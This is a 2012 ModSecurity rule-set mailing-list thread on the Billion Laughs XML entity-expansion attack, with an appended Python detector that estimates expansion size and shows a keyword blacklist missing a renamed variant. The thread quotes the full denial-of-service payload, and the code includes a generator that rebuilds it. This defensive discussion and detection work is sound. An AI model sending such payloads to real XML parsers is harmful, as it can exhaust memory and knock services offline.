hmm, what should modsec do here? Using a blacklist for lol, then the attacker replaces lol by lulz ;-)

This is completely valid XML syntax. I guess it is not simply detectable as an attack, just think about this example:

<?xml version="1.0"?><!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;">
<!ENTITY lol2 "&lol;">
<!ENTITY lol3 "&lol1;&lol2;">
<!ENTITY lol4 "&lol2;&lol3;">
....
]><lolz>&lol9;</lolz>

You need a sophisticated XML parser for that. If an application is that stupid that it accepts such user supplied XML, you better disconnect it from the network rather than trying to hot patch it, IMHO.

Just my 2 pence,
Achim

On 20.10.2012 22:42, Tzury Bar Yochay wrote:
> Hi,
>
> I just came across this Wikipedia article called Billion Laughs
> http://en.wikipedia.org/wiki/Billion_laughs and wonder if anyone ever
> tested modsec XML parsing against that one
>
> The vector is
>
> <?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol">
> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
> ]><lolz>&lol9;</lolz>

_______________________________________________
Owasp-modsecurity-core-rule-set mailing list
Owasp-modsecurity-core-rule-set@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set
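The two points made in this exchange (a keyword blacklist on "lol" is trivially renamed away, and entity expansion is only detectable by actually reasoning about the DTD) can be shown in a small pre-parse check. The following is an added example, not code from this thread, from ModSecurity or from the CRS. It reads the general entities declared in the internal DTD subset and computes, purely arithmetically, how large the document body would become after full expansion, so the 3 GB result of the Wikipedia vector is found without materializing a single byte of it. It also handles the Fibonacci-style chaining Achim sketches (lol3 = lol1 + lol2, and so on) and rejects recursive declarations. The regexes, the `make_bomb` generator used to construct sample input, and the thresholds `MAX_EXPANDED` / `MAX_RATIO` are all my own simplifications and assumptions; parameter entities and external entities are out of scope here and a real parser must account for them as well.

```python
import re

# Regexes for the internal DTD subset (assumption: a simplified grammar that
# covers general entities with single- or double-quoted replacement text).
DOCTYPE = re.compile(r'<!DOCTYPE\s+[^\[>]*\[(.*?)\]\s*>', re.S)
ENTITY_DECL = re.compile(r'''<!ENTITY\s+([A-Za-z_][\w.-]*)\s+(?:"([^"]*)"|'([^']*)')\s*>''')
ENTITY_REF = re.compile(r'&([A-Za-z_][\w.-]*);')
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}  # each expands to 1 char

# Chosen thresholds (assumption; tune to what the backend can actually handle).
MAX_EXPANDED = 10_000_000   # absolute expanded body size in characters
MAX_RATIO = 100             # expanded size / raw document size


def make_bomb(prefix="lol", depth=9, fanout=10):
    """Constructed sample input: rebuilds the Wikipedia vector quoted in the thread
    (prefix="lol") or a renamed variant of it (e.g. prefix="lulz")."""
    decls = [f'<!ENTITY {prefix} "{prefix}">']
    prev = prefix
    for i in range(1, depth + 1):
        name = f"{prefix}{i}"
        decls.append(f'<!ENTITY {name} "{("&" + prev + ";") * fanout}">')
        prev = name
    root = f"{prefix}z"
    return (f'<?xml version="1.0"?><!DOCTYPE {root} [ ' + " ".join(decls)
            + f' ]><{root}>&{prev};</{root}>')


BILLION_LAUGHS = make_bomb()                  # the vector from the thread
RENAMED = make_bomb(prefix="lulz")            # Achim's "replace lol by lulz"
BENIGN = ('<?xml version="1.0"?><!DOCTYPE note [ <!ENTITY company "Example Corp"> ]>'
          '<note>&company; &amp; partners</note>')          # constructed, harmless
RECURSIVE = '<!DOCTYPE a [ <!ENTITY a "&b;"> <!ENTITY b "&a;"> ]><a>&a;</a>'  # never well-formed


def naive_blacklist(doc):
    """The approach Achim dismisses: match a literal token from the known payload."""
    return "lol" in doc


def declared_entities(doc):
    """Map entity name -> replacement text for the internal DTD subset."""
    m = DOCTYPE.search(doc)
    if not m:
        return {}
    return {d.group(1): d.group(2) if d.group(2) is not None else d.group(3)
            for d in ENTITY_DECL.finditer(m.group(1))}


def expanded_length(text, entities, cache, stack=()):
    """Length of `text` after full entity expansion, computed without expanding.
    `cache` memoizes per-entity sizes; `stack` detects recursive declarations."""
    total, pos = 0, 0
    for ref in ENTITY_REF.finditer(text):
        name = ref.group(1)
        total += ref.start() - pos
        pos = ref.end()
        if name in PREDEFINED:
            total += PREDEFINED[name]
        elif name in entities:
            if name in stack:
                raise ValueError(f"recursive entity reference: {name}")
            if name not in cache:
                cache[name] = expanded_length(entities[name], entities, cache, stack + (name,))
            total += cache[name]
        else:
            total += len(ref.group(0))   # undefined entity: reference stays as written
    return total + len(text) - pos


def analyze(doc):
    """Return expansion statistics for the document body (everything after the DOCTYPE)."""
    entities = declared_entities(doc)
    m = DOCTYPE.search(doc)
    body = doc[m.end():] if m else doc
    cache = {}
    body_expanded = expanded_length(body, entities, cache)
    return {"entities": len(entities), "entity_sizes": cache,
            "body_expanded": body_expanded,
            "ratio": body_expanded / max(len(doc), 1)}


def is_entity_bomb(doc, max_expanded=MAX_EXPANDED, max_ratio=MAX_RATIO):
    """True if the document should be rejected before it reaches a real XML parser."""
    try:
        stats = analyze(doc)
    except ValueError:
        return True   # recursive entities are not well-formed XML; reject outright
    return stats["body_expanded"] > max_expanded or stats["ratio"] > max_ratio


if __name__ == "__main__":
    for label, doc in [("billion laughs", BILLION_LAUGHS), ("renamed", RENAMED),
                       ("benign", BENIGN), ("recursive", RECURSIVE)]:
        print(f"{label:15} blacklist={naive_blacklist(doc)!s:5} bomb={is_entity_bomb(doc)}")
```

Running the block shows the contrast Achim describes: the blacklist catches the original vector and misses the renamed one, while the size estimate flags both (the original expands to 3,000,000,013 characters) and passes the benign document, whose body expands to 36 characters. Note that the estimate is linear in the number of declarations and references, so the check itself cannot be turned into the denial of service it is guarding against.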